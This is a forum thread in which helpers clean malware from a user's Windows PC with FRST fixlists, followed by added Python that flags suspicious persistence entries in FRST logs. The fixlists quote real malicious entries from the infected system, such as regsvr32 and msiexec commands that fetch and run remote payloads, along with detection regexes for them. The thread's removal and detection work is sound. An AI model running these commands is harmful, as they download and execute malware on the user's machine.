Elektroda.pl

Unwanted viruses on the computer, toolbars and pop-ups

aureg 28 Apr 2017 17:53
  • #2 28 Apr 2017 20:19
    Acorus 20
    Computer specialist

    Uninstall ASUS WebStorage Sync Agent. Open Windows Notepad and paste:

    Task: {05201B2E-A49A-49DD-9598-DA0DB1A20649} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== scrobj.dll
    Task: {2855AB14-B9E8-4573-93D6-51C5E348F916} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Task: {43794CFB-9F9B-42DC-93F4-389D753E9887} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {7AED2CB5-8084-4FF1-9B73-1E4FBC3D16B4} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== scrobj.dll
    Task: {94F9E3DD-50AD-44C1-818E-FD51C6943FF6} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    ShortcutWithArgument: C:\Users\sabina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    ShortcutWithArgument: C:\Users\sabina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== /q
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\MountPoints2: {cbbef2bb-7939-11e4-824f-806e6f6e6963} - "F:\start.exe"
    HKU\S-1-5-18\...\RunOnce: [Adobe Speed Launcher] => 1430569694
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={23FA10D9-86B4-4320-919B-52C9ADB1A178}&mid=cf490ca57a0947d29d3b915f38f4dcf5-b52e40e6242da215442f22676987b7b79c949add&lang=en&ds=ft013&coid=avgtbdisft&cmpid=0415tb&pr=sa&d=2014-09-24 08:55:36&v=19.6.0.592&pid=safeguard&sg=&sap=dsp&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={23FA10D9-86B4-4320-919B-52C9ADB1A178}&mid=cf490ca57a0947d29d3b915f38f4dcf5-b52e40e6242da215442f22676987b7b79c949add&lang=en&ds=ft013&coid=avgtbdisft&cmpid=0415tb&pr=sa&d=2014-09-24 08:55:36&v=19.6.0.592&pid=safeguard&sg=&sap=dsp&q={searchTerms}
    Toolbar: HKLM - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG SafeGuard toolbar\19.6.0.592\AVG SafeGuard toolbar_toolbar.dll [2016-08-24] (AVG Secure Search)
    Toolbar: HKLM-x32 - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG SafeGuard toolbar\19.6.0.592\AVG SafeGuard toolbar_toolbar.dll [2016-08-24] (AVG Secure Search)
    FF SearchPlugin: C:\Users\sabina\AppData\Roaming\Firefox\Firefox\Profiles\7nimpe38.default\searchplugins\startsearch.xml [2017-04-19]
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492581494&z=658db6884c176c16e5f02a7gbzctbo6w8b7gezfbbz&from=che0812&uid=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe <==== UWAGA
    R2 SNARE; C:\Users\sabina\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    S4 3DM; C:\Users\sabina\AppData\Local\3DM\Kitty.dll [X]
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    S2 WinSAPSvc; C:\Users\sabina\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== UWAGA
    R1 {2859046f-5dca-482a-8c2d-37943d33a392}w64; C:\WINDOWS\System32\drivers\{2859046f-5dca-482a-8c2d-37943d33a392}w64.sys [48792 2014-11-04] (StdLib)
    R1 {29302da5-1178-40ac-a178-4cb57ebcc501}w64; C:\WINDOWS\System32\drivers\{29302da5-1178-40ac-a178-4cb57ebcc501}w64.sys [48792 2014-10-25] (StdLib)
    R1 {5f0f49f4-526a-4e0c-b198-a0742c879601}w64; C:\WINDOWS\System32\drivers\{5f0f49f4-526a-4e0c-b198-a0742c879601}w64.sys [48784 2014-11-29] (StdLib)
    R1 {6db7eb66-a30b-41a3-809c-addb2341dafb}w64; C:\WINDOWS\System32\drivers\{6db7eb66-a30b-41a3-809c-addb2341dafb}w64.sys [48792 2014-11-01] (StdLib)
    R1 {7012eec1-4f37-42d4-a2cd-26727494d248}Gw64; C:\WINDOWS\System32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}Gw64.sys [48792 2014-10-14] (StdLib)
    R1 {7012eec1-4f37-42d4-a2cd-26727494d248}w64; C:\WINDOWS\System32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}w64.sys [48792 2014-10-15] (StdLib)
    R1 {794fff75-3f4f-4508-a917-eee2946e84aa}w64; C:\WINDOWS\System32\drivers\{794fff75-3f4f-4508-a917-eee2946e84aa}w64.sys [48784 2014-11-26] (StdLib)
    R1 {88155b61-d5d0-401c-9c66-16b32c330fd8}w64; C:\WINDOWS\System32\drivers\{88155b61-d5d0-401c-9c66-16b32c330fd8}w64.sys [48784 2014-11-29] (StdLib)
    R1 {8c39d0b0-9b68-43ef-bc3c-2ef385fe5169}w64; C:\WINDOWS\System32\drivers\{8c39d0b0-9b68-43ef-bc3c-2ef385fe5169}w64.sys [48792 2014-11-06] (StdLib)
    R1 {9de7e012-74d3-4f9d-b4b0-2d3150073168}w64; C:\WINDOWS\System32\drivers\{9de7e012-74d3-4f9d-b4b0-2d3150073168}w64.sys [48792 2014-11-10] (StdLib)
    R1 {a6762132-8e80-4305-b1ba-2bec91757ac2}w64; C:\WINDOWS\System32\drivers\{a6762132-8e80-4305-b1ba-2bec91757ac2}w64.sys [48792 2014-10-22] (StdLib)
    R1 {b30c55f2-a940-4907-8051-f13c9acdacdd}w64; C:\WINDOWS\System32\drivers\{b30c55f2-a940-4907-8051-f13c9acdacdd}w64.sys [48784 2014-11-27] (StdLib)
    R1 {cd63c300-b231-4a93-a479-5a1e96976d74}Gw64; C:\WINDOWS\System32\drivers\{cd63c300-b231-4a93-a479-5a1e96976d74}Gw64.sys [48760 2016-01-08] (StdLib)
    R1 {cd63c300-b231-4a93-a479-5a1e96976d74}w64; C:\WINDOWS\System32\drivers\{cd63c300-b231-4a93-a479-5a1e96976d74}w64.sys [48784 2014-11-30] (StdLib)
    R1 {dda91daf-e6f8-4453-88d1-df18d861c904}w64; C:\WINDOWS\System32\drivers\{dda91daf-e6f8-4453-88d1-df18d861c904}w64.sys [48792 2014-10-28] (StdLib)
    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
    2017-04-24 09:17 - 2017-04-28 16:44 - 00003472 _____ C:\WINDOWS\System32\Tasks\T0528
    2017-04-19 12:21 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-19 12:21 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000007 _____ C:\WINDOWS\SysWOW64\CAC7.tmp
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000000 ____D C:\Users\sabina\AppData\Local\Eastness
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 17:16 - 2017-04-28 17:21 - 00000000 ____D C:\Users\sabina\AppData\Roaming\WinSAPSvc
    2017-04-17 17:16 - 2017-04-28 16:46 - 00000023 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 17:16 - 2017-04-28 16:43 - 00003604 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-17 17:16 - 2017-04-27 13:44 - 00000000 ____D C:\Users\sabina\AppData\Local\SNARE
    2017-04-17 17:16 - 2017-04-17 17:17 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 18:49 - 2017-04-28 16:44 - 00003580 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-10 19:01 - 2017-04-28 16:44 - 00003570 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-28 16:44 - 2015-10-15 18:32 - 00003264 _____ C:\WINDOWS\System32\Tasks\{E6EF4CE2-CB63-4B4A-8956-F4B662836D78}
    EmptyTemp:

    Save the file as fixlist.txt and put it in the same folder as FRST.
    Run FRST as administrator and click Fix (Napraw).
    Download AdwCleaner https://toolslib.net/downloads/finish/1/ and run it as administrator. Click Scan (Skanuj) and then Cleaning (Oczyść).
    Post a new FRST report, without Addition and Shortcut.

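The fixlist above is built by reading the FRST log and pulling out the persistence entries that do not belong: scheduled tasks that pull code from the web through regsvr32 or msiexec, a Winlogon Shell that starts a second program next to explorer.exe, IFEO Debugger entries that hijack Task Manager, and services whose DLLs sit under a user profile, are unsigned, or no longer exist. As an added example, not code from the post or from FRST's authors, the Python below runs those same checks over FRST log lines so the triage is repeatable. The sample lines are copied from the fixlist in this post (defanged hxxp URLs as FRST prints them) plus one constructed benign control line; the technique labels are this example's own wording, and the English "[File not signed]" marker is assumed to be FRST's English equivalent of the Polish "[Brak podpisu cyfrowego]" seen here.

```python
import re
from dataclasses import dataclass

# Constructed sample input: FRST log lines copied from the fixlist in the post
# above, plus one benign control line that is NOT from the page.
SAMPLE_LINES = [
    r"Task: {05201B2E-A49A-49DD-9598-DA0DB1A20649} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== scrobj.dll",
    r"Task: {2855AB14-B9E8-4573-93D6-51C5E348F916} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q",
    r"Task: {43794CFB-9F9B-42DC-93F4-389D753E9887} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1",
    r"HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== /q",
    r"IFEO\taskmgr.exe: [Debugger]",
    r"R2 SNARE; C:\Users\sabina\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]",
    r"S2 WinSAPSvc; C:\Users\sabina\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== UWAGA",
    r"ShortcutWithArgument: C:\Users\sabina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...",
    # constructed benign control line (not from the page): a normal updater task
    r"Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc.)",
]


@dataclass(frozen=True)
class Finding:
    technique: str   # label from RULES below
    line: str        # the FRST log line that triggered it


URL = r"(?:hxxps?|https?)://"   # FRST defangs http(s) as hxxp(s)

# (technique label, regex over one FRST line). Labels are this example's own
# wording, not FRST's.
RULES = [
    # regsvr32 /i:<url> scrobj.dll fetches and runs a remote COM scriptlet
    ("regsvr32 loads remote scriptlet via scrobj.dll",
     re.compile(r"regsvr32.*\s/i:" + URL + r".*scrobj\.dll", re.I)),
    # msiexec /i <url> installs an MSI package straight from the web
    ("msiexec installs remote package",
     re.compile(r"msiexec(?:\.exe)?\s+/i\s+" + URL, re.I)),
    ("scheduled task runs a PowerShell script",
     re.compile(r"^Task:.*=>\s*powershell(?:\.exe)?\s", re.I)),
    # Winlogon Shell should be exactly explorer.exe; anything after the comma
    # is started at every logon as well
    ("Winlogon Shell runs more than explorer.exe",
     re.compile(r"\[Shell\]\s*explorer\.exe\s*,\s*\S", re.I)),
    # an IFEO Debugger value makes Windows run the "debugger" instead of the
    # named program (here: Task Manager never starts)
    ("IFEO Debugger set (hijacks the named program)",
     re.compile(r"^IFEO\\.*\[Debugger\]", re.I)),
    # service/driver lines start with R|S plus start type; a service binary
    # under C:\Users is not where legitimate services live
    ("service binary lives in a user profile",
     re.compile(r"^[RS]\d \S+; C:\\Users\\", re.I)),
    # Polish wording from the page; English "[File not signed]" is assumed
    ("service binary is unsigned",
     re.compile(r"\[(?:File not signed|Brak podpisu cyfrowego)\]", re.I)),
    # [X] means FRST could not find the file on disk
    ("service binary missing ([X])",
     re.compile(r"^[RS]\d .*\[X\]")),
    # browser shortcut whose argument is a URL: homepage hijack via .lnk
    ("browser shortcut launched with a URL argument",
     re.compile(r"^ShortcutWithArgument:.*->\s*" + URL, re.I)),
]


def triage(lines):
    """Return one Finding per (line, matching rule), in log order."""
    findings = []
    for raw in lines:
        line = raw.strip()
        for technique, rx in RULES:
            if rx.search(line):
                findings.append(Finding(technique, line))
    return findings


def techniques_for(lines):
    """Map each flagged line to the sorted technique labels it triggered."""
    out = {}
    for f in triage(lines):
        out.setdefault(f.line, []).append(f.technique)
    return {line: sorted(techs) for line, techs in out.items()}


def build_fixlist(lines):
    """Flagged lines, deduplicated and in log order, as an FRST fixlist body.
    FRST cleanup threads paste the log line itself into fixlist.txt, so the
    entry is the line verbatim; EmptyTemp: at the end clears temp folders,
    as in the fixlist in the post."""
    seen, out = set(), []
    for f in triage(lines):
        if f.line not in seen:
            seen.add(f.line)
            out.append(f.line)
    out.append("EmptyTemp:")
    return out


if __name__ == "__main__":
    for line, techs in techniques_for(SAMPLE_LINES).items():
        print("; ".join(techs))
        print("    " + line[:110])
```

The rules only cover what this post shows; the browser hijack lines (Start Page, SearchScopes, CHR HomePage) and the StdLib drivers were taken from the same log by the helper and would need rules of their own. Nothing here replaces reading the Addition.txt output, and the flagged lines still need a human decision before they go into fixlist.txt, since FRST deletes whatever the fixlist names.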
  • #4 28 Apr 2017 21:14
    Kolobos
    Computer specialist

    New fixlist.txt for FRST:
    2017-04-28 20:48 - 2017-04-28 20:59 - 00000000 ____D C:\AdwCleaner
    2017-04-27 13:48 - 2017-04-28 16:10 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-20 20:13 - 2017-04-28 13:13 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-20 19:40 - 2017-04-25 14:38 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 19:30 - 2017-04-25 14:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-19 12:21 - 2017-04-28 20:59 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-19 07:58 - 2017-04-28 17:10 - 00000000 ____D C:\Users\sabina\AppData\Local\3DM

    After it runs, delete the C:\FRST folder and that's it.
